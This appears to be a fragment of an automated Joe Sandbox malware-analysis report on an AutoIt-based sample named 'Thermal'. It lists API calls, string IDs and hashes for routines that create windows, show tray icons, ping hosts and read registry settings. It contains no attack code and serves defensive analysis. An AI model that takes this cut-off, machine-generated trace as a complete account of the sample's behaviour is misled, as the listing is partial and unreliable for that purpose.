                                                • RegisterClassExW.USER32(00000030), ref: 0077346E
                                                • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0077347F
                                                • InitCommonControlsEx.COMCTL32(?), ref: 0077349C
                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 007734AC
                                                • LoadIconW.USER32(000000A9), ref: 007734C2
                                                • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 007734D1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                • API String ID: 2914291525-1005189915
                                                • Opcode ID: 7728f520895cec6dd0bdd7e1894f1f73dd7d363f03aa0e0c6b97f9351a53055a
                                                • Instruction ID: ab4f0fb1768940948c0034b6251d5e6ea1184a2a39cf6659d66a9f3f7e5671c8
                                                • Opcode Fuzzy Hash: 7728f520895cec6dd0bdd7e1894f1f73dd7d363f03aa0e0c6b97f9351a53055a
                                                • Instruction Fuzzy Hash: 1A21E3B1904218AFEB509FA4EC89B9EBBF4FB08710F00852AFA15A62A0D7B55544CF95
                                                APIs
                                                  • Part of subcall function 007900CF: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00783094), ref: 007900ED
                                                  • Part of subcall function 007908C1: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,0078309F), ref: 007908E3
                                                • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 007830E2
                                                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 007C01BA
                                                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 007C01FB
                                                • RegCloseKey.ADVAPI32(?), ref: 007C0239
                                                • _wcscat.LIBCMT ref: 007C0292
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                • API String ID: 2673923337-2727554177
                                                • Opcode ID: ed7526c09de574574a32bdf83cf8fa1e61b76294430f6b5a8f75f359457aa6ff
                                                • Instruction ID: bcd553c35fc3d4eeb5ab8c97ca1affd2f47b0c41161cc39fe965bf5e1edaf449
                                                • Opcode Fuzzy Hash: ed7526c09de574574a32bdf83cf8fa1e61b76294430f6b5a8f75f359457aa6ff
                                                • Instruction Fuzzy Hash: E2715871549701DEC704EF69EC899ABBBA8FF84340F80092EF555C32A1EF749949CB92
                                                APIs
                                                • GetSysColorBrush.USER32(0000000F), ref: 00785156
                                                • LoadCursorW.USER32(00000000,00007F00), ref: 00785165
                                                • LoadIconW.USER32(00000063), ref: 0078517C
                                                • LoadIconW.USER32(000000A4), ref: 0078518E
                                                • LoadIconW.USER32(000000A2), ref: 007851A0
                                                • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 007851C6
                                                • RegisterClassExW.USER32(?), ref: 0078521C
                                                  • Part of subcall function 00773411: GetSysColorBrush.USER32(0000000F), ref: 00773444
                                                  • Part of subcall function 00773411: RegisterClassExW.USER32(00000030), ref: 0077346E
                                                  • Part of subcall function 00773411: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0077347F
                                                  • Part of subcall function 00773411: InitCommonControlsEx.COMCTL32(?), ref: 0077349C
                                                  • Part of subcall function 00773411: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 007734AC
                                                  • Part of subcall function 00773411: LoadIconW.USER32(000000A9), ref: 007734C2
                                                  • Part of subcall function 00773411: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 007734D1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                • String ID: #$0$AutoIt v3
                                                • API String ID: 423443420-4155596026
                                                • Opcode ID: cb9491bfd742b7d29c9ee27cc98ff2744ddaefacae37ab2a1009764de54ec54f
                                                • Instruction ID: 6542512517b1c09f7dad82d2d3a08dc4a9ae5e0a7dd65432fd194eb1516d6cab
                                                • Opcode Fuzzy Hash: cb9491bfd742b7d29c9ee27cc98ff2744ddaefacae37ab2a1009764de54ec54f
                                                • Instruction Fuzzy Hash: BA216DB1D04309AFEB209FA4ED09B9E7BF5FB48310F004519F505A62A1C7B69540DF84
                                                APIs
                                                • WSAStartup.WS2_32(00000101,?), ref: 007E5E7E
                                                • inet_addr.WSOCK32(?,?,?), ref: 007E5EC3
                                                • gethostbyname.WS2_32(?), ref: 007E5ECF
                                                • IcmpCreateFile.IPHLPAPI ref: 007E5EDD
                                                • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 007E5F4D
                                                • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 007E5F63
                                                • IcmpCloseHandle.IPHLPAPI(00000000), ref: 007E5FD8
                                                • WSACleanup.WSOCK32 ref: 007E5FDE
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                • String ID: Ping
                                                • API String ID: 1028309954-2246546115
                                                • Opcode ID: cbcdb95d23b8e2030e76acd7c13986fa9f948985117806bc1f647ec0a39dfad5
                                                • Instruction ID: 0b591ba1ef54b7854c2b7b56e5b19ff44d63edccd79093440a231f98ead9ddce
                                                • Opcode Fuzzy Hash: cbcdb95d23b8e2030e76acd7c13986fa9f948985117806bc1f647ec0a39dfad5
                                                • Instruction Fuzzy Hash: 2A518A31605745DFDB20EF25CC49B2AB7E4AF48724F148929F999DB2A1DB78E900CB42
                                                APIs
                                                • DefWindowProcW.USER32(?,?,?,?), ref: 00784E22
                                                • KillTimer.USER32(?,00000001), ref: 00784E4C
                                                • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00784E6F
                                                • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00784E7A
                                                • CreatePopupMenu.USER32 ref: 00784E8E
                                                • PostQuitMessage.USER32(00000000), ref: 00784EAF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                • String ID: TaskbarCreated
                                                • API String ID: 129472671-2362178303
                                                • Opcode ID: fb5e8ee0eaa864c5b6ce3c5fcb2a689b7832a230a9499c51ab6f9f6a23233555
                                                • Instruction ID: 9faa0501a0faab4aac7cb655baa855d0c6ddaccaae8d3b1a61ece8b0900ffb28
                                                • Opcode Fuzzy Hash: fb5e8ee0eaa864c5b6ce3c5fcb2a689b7832a230a9499c51ab6f9f6a23233555
                                                • Instruction Fuzzy Hash: 8241D7B128420BEBEB757F64DC4DB7A3695F785301F000529F502D12A1CABDDC50D7A5
                                                APIs
                                                • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 007C0C5B
                                                  • Part of subcall function 00781821: _memmove.LIBCMT ref: 0078185B
                                                • _memset.LIBCMT ref: 00785787
                                                • _wcscpy.LIBCMT ref: 007857DB
                                                • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 007857EB
                                                • __swprintf.LIBCMT ref: 007C0CD1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: IconLoadNotifyShell_String__swprintf_memmove_memset_wcscpy
                                                • String ID: Line %d: $AutoIt -
                                                • API String ID: 230667853-4094128768
                                                • Opcode ID: f80ed61e25e24294345b844a23acc874c353e5b8ebf254739afdfcf3e26d2027
                                                • Instruction ID: fe9b65077d22144cf393183ad7111cc3f8b246d4a075470dd2cede177e54f65b
                                                • Opcode Fuzzy Hash: f80ed61e25e24294345b844a23acc874c353e5b8ebf254739afdfcf3e26d2027
                                                • Instruction Fuzzy Hash: 464193B1048304EAD321FB60DC49FDF77ECAF84350F504A1EF195921A2EB78A649CB96
                                                APIs
                                                • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00785109
                                                • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 0078512A
                                                • ShowWindow.USER32(00000000), ref: 0078513E
                                                • ShowWindow.USER32(00000000), ref: 00785147
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Window$CreateShow
                                                • String ID: AutoIt v3$edit
                                                • API String ID: 1584632944-3779509399
                                                • Opcode ID: 1308554be5bafbd662c84ad576ccd073b1b6a92ffdb01816418b227341f7edb3
                                                • Instruction ID: 448877307bab512a9c848268561ac21fb5d33204806bd9a172e5802d15e852d7
                                                • Opcode Fuzzy Hash: 1308554be5bafbd662c84ad576ccd073b1b6a92ffdb01816418b227341f7edb3
                                                • Instruction Fuzzy Hash: 21F03AB06442947EEA7117276C08F372EBDF7C6F20F00041AB900A22B1CA655840DEB0
                                                APIs
                                                  • Part of subcall function 00784A8C: _fseek.LIBCMT ref: 00784AA4
                                                  • Part of subcall function 007D9CF1: _wcscmp.LIBCMT ref: 007D9DE1
                                                  • Part of subcall function 007D9CF1: _wcscmp.LIBCMT ref: 007D9DF4
                                                • _free.LIBCMT ref: 007D9C5F
                                                • _free.LIBCMT ref: 007D9C66
                                                • _free.LIBCMT ref: 007D9CD1
                                                  • Part of subcall function 00792F85: RtlFreeHeap.NTDLL(00000000,00000000,?,00799C54,00000000,00798D5D,007959C3), ref: 00792F99
                                                  • Part of subcall function 00792F85: GetLastError.KERNEL32(00000000,?,00799C54,00000000,00798D5D,007959C3), ref: 00792FAB
                                                • _free.LIBCMT ref: 007D9CD9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                • String ID: >>>AUTOIT SCRIPT<<<
                                                • API String ID: 1552873950-2806939583
                                                • Opcode ID: fbf437cb0422c114f6c71b3a44b462749b57261469c424e6542ab0f8296d2ddf
                                                • Instruction ID: bcacbddf0976f39138d6e6cb0fc9a4de801c241592e2e32aec5cdf969efdd23d
                                                • Opcode Fuzzy Hash: fbf437cb0422c114f6c71b3a44b462749b57261469c424e6542ab0f8296d2ddf
                                                • Instruction Fuzzy Hash: E15149B1904219EFDF24EF64DC85AAEBBB9FF48304F00409EB249A7341DB755A808F59
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                • String ID:
                                                • API String ID: 1559183368-0
                                                • Opcode ID: 00b866a24d890f7fe79ae922164f866efed2fee1f991de586a4896b02612db73
                                                • Instruction ID: 72093f9a23a7f21224305384438e78ba48d8c6feb7d0fcc2392439768f63b933
                                                • Opcode Fuzzy Hash: 00b866a24d890f7fe79ae922164f866efed2fee1f991de586a4896b02612db73
                                                • Instruction Fuzzy Hash: 2C51D430A00B25DBDF268FB9E88466E77B6EF41720F24872DF835962D0D7789E509B40
                                                APIs
                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 007752E6
                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0077534A
                                                • TranslateMessage.USER32(?), ref: 00775356
                                                • DispatchMessageW.USER32(?), ref: 00775360
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Message$Peek$DispatchTranslate
                                                • String ID:
                                                • API String ID: 1795658109-0
                                                • Opcode ID: a5df2ac3e74764b3a7517cf3ee87b1dcdad73945c1ac94b810f4d3fdd3049602
                                                • Instruction ID: 3e3594d673c05dc2df3ff617d0222038a8820727a8f458930f12ea4b350b6331
                                                • Opcode Fuzzy Hash: a5df2ac3e74764b3a7517cf3ee87b1dcdad73945c1ac94b810f4d3fdd3049602
                                                • Instruction Fuzzy Hash: 4931F670508B059EEF308B64DC48BBA37A8BB82388F148569E42B971F1D7FDD845E711
                                                APIs
                                                  • Part of subcall function 007907BB: MapVirtualKeyW.USER32(0000005B,00000000), ref: 007907EC
                                                  • Part of subcall function 007907BB: MapVirtualKeyW.USER32(00000010,00000000), ref: 007907F4
                                                  • Part of subcall function 007907BB: MapVirtualKeyW.USER32(000000A0,00000000), ref: 007907FF
                                                  • Part of subcall function 007907BB: MapVirtualKeyW.USER32(000000A1,00000000), ref: 0079080A
                                                  • Part of subcall function 007907BB: MapVirtualKeyW.USER32(00000011,00000000), ref: 00790812
                                                  • Part of subcall function 007907BB: MapVirtualKeyW.USER32(00000012,00000000), ref: 0079081A
                                                  • Part of subcall function 0078FF4C: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0077AC6B), ref: 0078FFA7
                                                • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0077AD08
                                                • OleInitialize.OLE32(00000000), ref: 0077AD85
                                                • CloseHandle.KERNEL32(00000000), ref: 007B2F56
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                • String ID: pg
                                                • API String ID: 1986988660-3979489971
                                                • Opcode ID: bfc73c9ad537bbf1444434a3ad05d844a29ff1cf2771de21db9ca2338bf2c60a
                                                • Instruction ID: 8150bfc902fd9bbe208aeb21053630e7e8963b1921fd4feb30e29d220c70c508
                                                • Opcode Fuzzy Hash: bfc73c9ad537bbf1444434a3ad05d844a29ff1cf2771de21db9ca2338bf2c60a
                                                • Instruction Fuzzy Hash: B281CAF0909284CED3A8EF69AC496557FE8FBD8304B40896AD558C7372E774E408DF98
                                                APIs
                                                • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00771275,SwapMouseButtons,00000004,?), ref: 007712A8
                                                • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00771275,SwapMouseButtons,00000004,?), ref: 007712C9
                                                • RegCloseKey.KERNEL32(00000000,?,?,?,80000001,80000001,?,00771275,SwapMouseButtons,00000004,?), ref: 007712EB
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: CloseOpenQueryValue
                                                • String ID: Control Panel\Mouse
                                                • API String ID: 3677997916-824357125
                                                • Opcode ID: dcde5a0564ca0457730d11bb98da9d40af65cadb591607315ef3a8d20f1897f4
                                                • Instruction ID: 3ada228c7bf1c8f4b1e4da7620f027b32513af0078e816bbdcc49e1f9cbb2d6f
                                                • Opcode Fuzzy Hash: dcde5a0564ca0457730d11bb98da9d40af65cadb591607315ef3a8d20f1897f4
                                                • Instruction Fuzzy Hash: 33111575610208BFDF208FA8DC84EEEBBACFF05781F508569E809D7210E6759E449BA4
                                                APIs
                                                • GetFileAttributesW.KERNEL32(?,00802C4C), ref: 007D3F57
                                                • GetLastError.KERNEL32 ref: 007D3F66
                                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 007D3F75
                                                • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00802C4C), ref: 007D3FD2
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: CreateDirectory$AttributesErrorFileLast
                                                • String ID:
                                                • API String ID: 2267087916-0
                                                • Opcode ID: 5b4c7cd752e06c403d309ae230ff84e51cbd5fd59c79f1b21bed6f4dcf63c47a
                                                • Instruction ID: 669b14306ef85362865dbe879f77026de6f6fd4fd5d63020372000b0295a3010
                                                • Opcode Fuzzy Hash: 5b4c7cd752e06c403d309ae230ff84e51cbd5fd59c79f1b21bed6f4dcf63c47a
                                                • Instruction Fuzzy Hash: 8B219F709482059FC710EF28D88586AB7F8FE59364F104A1EF4A5C73A1DB34DA4ACB53
                                                APIs
                                                • _memset.LIBCMT ref: 00785B58
                                                  • Part of subcall function 007856F8: _memset.LIBCMT ref: 00785787
                                                  • Part of subcall function 007856F8: _wcscpy.LIBCMT ref: 007857DB
                                                  • Part of subcall function 007856F8: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 007857EB
                                                • KillTimer.USER32(?,00000001,?,?), ref: 00785BAD
                                                • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00785BBC
                                                • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 007C0D7C
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                • String ID:
                                                • API String ID: 1378193009-0
                                                • Opcode ID: ca8547e97e4d944f68ba63b64e0e6e4b4158818b82d747d41bfbd710cac7caef
                                                • Instruction ID: 1c6cb560f312ff44c77265eaccedf7eb84ca21f360b07dbddde63f9df895766b
                                                • Opcode Fuzzy Hash: ca8547e97e4d944f68ba63b64e0e6e4b4158818b82d747d41bfbd710cac7caef
                                                • Instruction Fuzzy Hash: C221DAB0544B84EFEB739B64C895FEBBFECAF11314F04048DE69A56141C3786A84CB91
                                                APIs
                                                  • Part of subcall function 007849C2: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,007827AF,?,00000001), ref: 007849F4
                                                • _free.LIBCMT ref: 007BFB04
                                                • _free.LIBCMT ref: 007BFB4B
                                                  • Part of subcall function 007829BE: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00782ADF
                                                Strings
                                                • Bad directive syntax error, xrefs: 007BFB33
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: _free$CurrentDirectoryLibraryLoad
                                                • String ID: Bad directive syntax error
                                                • API String ID: 2861923089-2118420937
                                                • Opcode ID: 603d086d9c0ca77d5be608ac3f28ec65de0c28dc5c592aa9efe4beebff97ff01
                                                • Instruction ID: 6b30583d3572ebd7f098fb14bd01a3caf358c98a732732d0325265769341578e
                                                • Opcode Fuzzy Hash: 603d086d9c0ca77d5be608ac3f28ec65de0c28dc5c592aa9efe4beebff97ff01
                                                • Instruction Fuzzy Hash: BD914E71950219EFCF18EFA8CC55AEDB7B4FF05710F14852AF815AB291EB38A905CB50
                                                APIs
